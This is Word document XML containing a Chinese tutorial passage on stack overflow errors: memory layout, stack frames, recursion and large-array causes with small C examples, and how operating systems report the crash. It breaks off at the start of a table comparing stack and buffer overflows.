    <w:p w14:paraId="0CC24176" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是一种常见的程序错误，通常发生在程序调用栈（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）使用超出其分配空间时。理解栈溢出的原理需要先了解程序运行时内存的基本布局和函数调用机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355FA1A" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="程序运行时的内存布局"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序运行时的内存布局</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64686DB1" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个典型的程序在运行时，其虚拟内存通常被划分为以下几个区域：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15450CA0" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码段（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存放程序的机器指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15020A21" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据段（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B49B7" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>初始化数据区（如全局变量、静态变量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0557AE07" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未初始化数据区（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBED08" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>堆（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：动态分配内存（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>malloc/new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），从低地址向高地址增长。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3780FF02" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>栈（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：用于函数调用时保存局部变量、参数、返回地址等，从高地址向低地址增长。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3C4EB" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈和堆通常是相对增长的，中间留有空隙以防碰撞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7366595D" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="函数调用与栈帧stack-frame）"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数调用与栈帧（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Frame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F3780" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每当一个函数被调用时，系统会在栈上创建一个“栈帧”（也叫活动记录，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Activation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），其中包含：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038106F1" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F3EC13" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B441EF" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回地址（调用该函数后应跳回的位置）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25524E09" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前一个栈帧的指针（如基址指针</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EBP/RBP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61886B6F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数返回时，该栈帧被弹出（释放），控制权交还给调用者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498E7C0E" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="栈溢出的成因"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出的成因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3A1327" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出主要由以下两种情况引起：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FDB8DB" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="X818e0092236050dfc08fd946c20c09b4bfcf1fe"/>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>递归过深（最常见）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A95C6F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果一个函数递归调用自身，但没有合适的终止条件（或终止条件无法到达），就会不断压入新的栈帧，最终耗尽栈空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4BF4FA" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> infinite_recursion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    infinite_recursion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>无终止条件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901EED1" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每次调用都占用栈空间，直到栈满</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发栈溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A339327" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="X75256bb2976bf513005b5a6cac9cc54b21d3d74"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>局部变量过大</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A12718" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在函数中声明非常大的局部数组（尤其是自动变量），可能一次性占用大量栈空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C659B15" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> big_local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 10MB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>的局部数组</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>如果栈大小只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1~8MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>（常见默认值），就会溢出</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB6CE4" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="操作系统如何处理栈溢出"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统如何处理栈溢出？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D2EC3" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当程序试图访问超出栈分配范围的内存时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47B0B4" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在大多数现代操作系统（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中，会触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>段错误（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Segmentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>栈溢出异常（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Overflow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852B644" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序通常会异常终止（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1827367B" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上你会看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>SIGSEGV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信号；在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>EXCEPTION_STACK_OVERFLOW</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361D630" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="栈溢出-vs-缓冲区溢出注意区分）"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区溢出（注意区分！）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62D08B" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很多人混淆“栈溢出”和“缓冲区溢出”：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3141"/>
        <w:gridCol w:w="2419"/>
        <w:gridCol w:w="2287"/>
        <w:gridCol w:w="3169"/>
      </w:tblGrid>
